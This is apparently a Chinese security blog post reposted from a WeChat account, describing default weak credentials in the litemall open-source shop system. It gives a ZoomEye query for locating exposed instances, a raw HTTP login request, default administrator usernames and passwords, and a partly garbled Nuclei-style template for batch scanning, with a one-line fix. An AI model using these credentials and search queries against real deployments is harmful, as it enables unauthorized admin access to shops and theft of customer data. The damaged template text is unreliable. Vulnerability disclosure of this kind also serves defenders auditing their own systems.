0x01 产品简介
litemall是一款小型商场系统的开发工具,使用者可通过该系统来完成前端、后端、小程序以及移动端等开发工作,使整个工作效率得到大幅度提升。该系统开发的功能包括了会员管理、商城管理、商品管理、客服等,有了这个工具便能轻轻松松获得完整的商场系统。这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可,影响资产5000+。
声明
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS: 末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞描述
攻击者可以利用弱口令漏洞直接访问应用系统或管理系统,进而进行系统、网页、数据的篡改或删除,非法窃取系统和用户的敏感数据,有时甚至导致整个服务器受到严重威胁。弱口令并没有严格的定义,但它们通常指的是那些容易被他人轻易猜测到或通过自动化工具破解的密码,例如简单的数字和字母组合,如"123456"、"abc"等。为了避免这些风险,强烈建议用户不要使用这类易受攻击的密码。
0x03 ZoomEye语法
app:"litemall"
0x04 漏洞复现
POC
POST /admin/auth/login HTTP/1.1Host: {hostname}Cookie: JSESSIONID=36427362-df7c-4e7c-b5ab-367e3eb92d48Content-Length: 55Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Accept: application/json, text/plain, */*Content-Type: application/jsonSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close{"username":"admin123","password":"admin123","code":""}
弱密码
超级管理员用户名: admin123 超级管理员用户名:admin123商城管理员用户名: mall123 商城管理员用户名:mall123推广管理员用户名: promotion123 推广管理员用户名:promotion123
id: litemall-weak-passwdinfo:name: litemall-weak-passwdauthor: 渗透安全HackTwoseverity: highdescription: |漏洞测试-公众号-渗透安全HackTworeference:https://127.0.0.1tags: autohttp:raw:|POST /admin/auth/login HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: application/jsonAccept: application/json, text/plain, */*: gzip, deflate, br: zh-CN,zh;q=0.9bConnection: close:"admin123","password":"admin123","code":""}: andmatchers:type: dsldsl:status_code==200 && contains_all(body, '"errmsg":"成功"')
0x05 修复建议
修改弱口令。
0x06
原文始发于微信公众号(渗透安全HackTwo):Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论